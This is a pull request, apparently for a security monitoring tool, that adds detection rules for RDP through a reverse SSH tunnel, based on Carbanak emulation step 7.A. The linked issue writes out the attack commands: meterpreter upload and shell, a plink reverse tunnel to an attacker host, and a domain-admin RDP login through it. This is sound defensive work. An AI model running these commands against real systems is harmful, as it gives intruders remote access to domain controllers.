### PR TITLE
Rules for suspicious RDP activity detection

### LINKED ISSUE #9184: Detect 7.A -  RDP through Reverse SSH Tunnel
Generate detection rule using the Carbanak [step 7.A](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/carbanak/Emulation_Plan/Scenario_1#7a---rdp-through-reverse-ssh-tunnel-t1572-t1021001)

- [x]  Test environment setup
- [x]  Collect relevant logs
- [x]  Write appropriate decoders and rules

#### Substeps:
1. Upload plink.exe to Domain Controller
    ```
    meterpreter > upload /home/<attacker>/carbanak/Resources/step5/plink.exe C:\\Windows\\Temp\\plink.exe
    ```

2. Spawn an interactive shell
    ```
    meterpreter > shell
    ```

3. Setup reverse SSH tunnel
    ```
    [bankdc CMD]> C:\Windows\Temp\plink.exe -pw "<attacker_ssh_user_password>" <attacker_ssh_user>@192.168.0.4 -R 3389:localhost:3389
    ```
    
    Decline cache key

    Your prompt should now look like: `$`

4. RDP to DC

    From your Ubuntu VM:

    1. Close your RDP session to `hrmanager`

    2. RDP into the DC, using your SSH tunnel:
        ```
        xfreerdp +clipboard /u:"<domain_admin>@<domain_full>" /p:"<domain_admin_password>" /v:192.168.0.4
        ```

    3. Accept any certificate warnings
     
    RDP will be slower than usual because we're going through an SSH tunnel

#### Detection criteria:
7.A.1 - tiny.exe downloads plink.exe from 192.168.0.4
7.A.2 - tiny.exe spawns cmd.exe
7.A.3 - plink.exe transmits data to 192.168.0.4 over SSH protocol
7.A.4 - User kmitnick logs on to bankdc (10.0.0.4)
7.A.5 - RDP session from the localhost over TCP port 3389

### PR DESCRIPTION
**Pull request by fabamatic**
|Related issue|
|---|
|closes #9184|

## Description

These rules detect activity based on step 7.A of MITRE's carbanak simulation.
3 rules were added:
-92064: level 0, logs when a user logs with an RDP connection is made, keeping name and domain (related substep 7.A.4)
-92065: level 15, generates an alert when a user logs using an RDP connection from loopback address
-92107: level 15, generates an alert when network activity over RDP port is made from-to loopback address

## Configuration options
These rules require sysmon to work

### CODE REVIEW

**Comment by fabamatic** [comment]
Converting to draft until rule file names refactor is complete

**Review by jcruzlp — APPROVED** [review]
LGTM!

**Review by JavierBejMen — APPROVED** [review]
LGTM

**Review by 72nomada — APPROVED** [review]
LGTM

**Pull request merged**
